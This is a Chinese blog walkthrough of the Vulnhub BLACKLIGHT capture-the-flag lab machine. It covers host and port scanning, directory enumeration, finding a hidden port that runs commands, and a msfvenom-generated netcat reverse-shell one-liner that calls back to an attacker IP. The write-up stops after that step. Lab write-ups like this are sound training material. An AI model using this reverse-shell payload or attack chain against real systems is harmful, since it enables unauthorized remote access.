Vulnhub靶机-BLACKLIGHT

项目地址

http://download.vulnhub.com/blacklight/BLACKLIGHT.ova

靶机渗透

网络选择桥接模式,使用命令

arp-scan -l
nmap 192.168.0.130

在这里插入图片描述

使用dirb遍历网站目录结构,命令dirb 192.168.0.130

在这里插入图片描述

发现其中一个文件,查看该文件发现里面记录了两个文件名称flag1.txtblacklight.dict

在这里插入图片描述访问两个文件,发现blacklight.dict是一个密码本,但是该靶机并没有开启22端口,也不能进行ssh枚举连接,另一个文件flag1.txt给了一串字符和一个句话,说什么 9072,答案(秘密)在靶机里

在这里插入图片描述

可能是告诉我们靶机的一个端口,使用nmap 192.168.0.130 -p 9072查看端口是否开放,发现该端口是打开的

在这里插入图片描述

使用nc 192.168.0.130 9072尝试与靶机建立会话,连接成功后告诉我们输入.help查看帮助命令,发现其可以使用.exec <cmd>执行命令

在这里插入图片描述
使用命令msfvenom -p cmd/unix/reverse_netcat lhost=192.168.0.109 lport=4444 R获得一个简易免杀语句,然后输入命令

.exec `mkfifo /tmp/bujhg; nc 192.168.0.109 4444 0</tmp/bujhg | /bin/sh >/tmp/bujhg 2>&1; rm /tmp/bujhg`

在这里插入图片描述

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值